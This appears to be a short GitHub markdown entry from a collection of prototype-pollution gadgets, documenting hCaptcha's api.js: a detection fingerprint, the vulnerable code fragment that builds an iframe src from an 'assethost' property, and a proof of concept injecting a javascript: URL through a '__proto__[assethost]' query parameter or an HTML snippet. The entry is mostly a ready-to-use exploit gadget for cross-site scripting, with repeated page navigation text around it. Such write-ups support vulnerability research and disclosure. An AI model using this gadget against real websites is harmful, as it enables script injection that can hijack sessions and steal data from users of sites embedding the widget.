hCaptcha

URL

https://docs.hcaptcha.com/

JS Fingerprint

typeof hcaptcha !== 'undefined'

Vulnerable code fragment

https://hcaptcha.com/1/api.js

ae.assethost && (n = ae.assethost + re.assetUrl.replace(re.assetDomain, "")),
this.$iframe.dom.src = n + "/hcaptcha-challenge.html#id=" + this.id + "&host=" + this._host + (t ? "&" + Rt(this.config) : ""),

PoC

?__proto__[assethost]=javascript:alert(1)//

<script src="https://hcaptcha.com/1/api.js" async defer></script>
<script>
  Object.prototype.assethost="javascript:alert(1)//"
</script>
<div class="h-captcha" data-sitekey="your-site-key"></div>

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

hcaptcha.md

hcaptcha.md

hCaptcha

URL

JS Fingerprint

Vulnerable code fragment

PoC

Files

hcaptcha.md

Latest commit

History

hcaptcha.md

File metadata and controls

hCaptcha

URL

JS Fingerprint

Vulnerable code fragment

PoC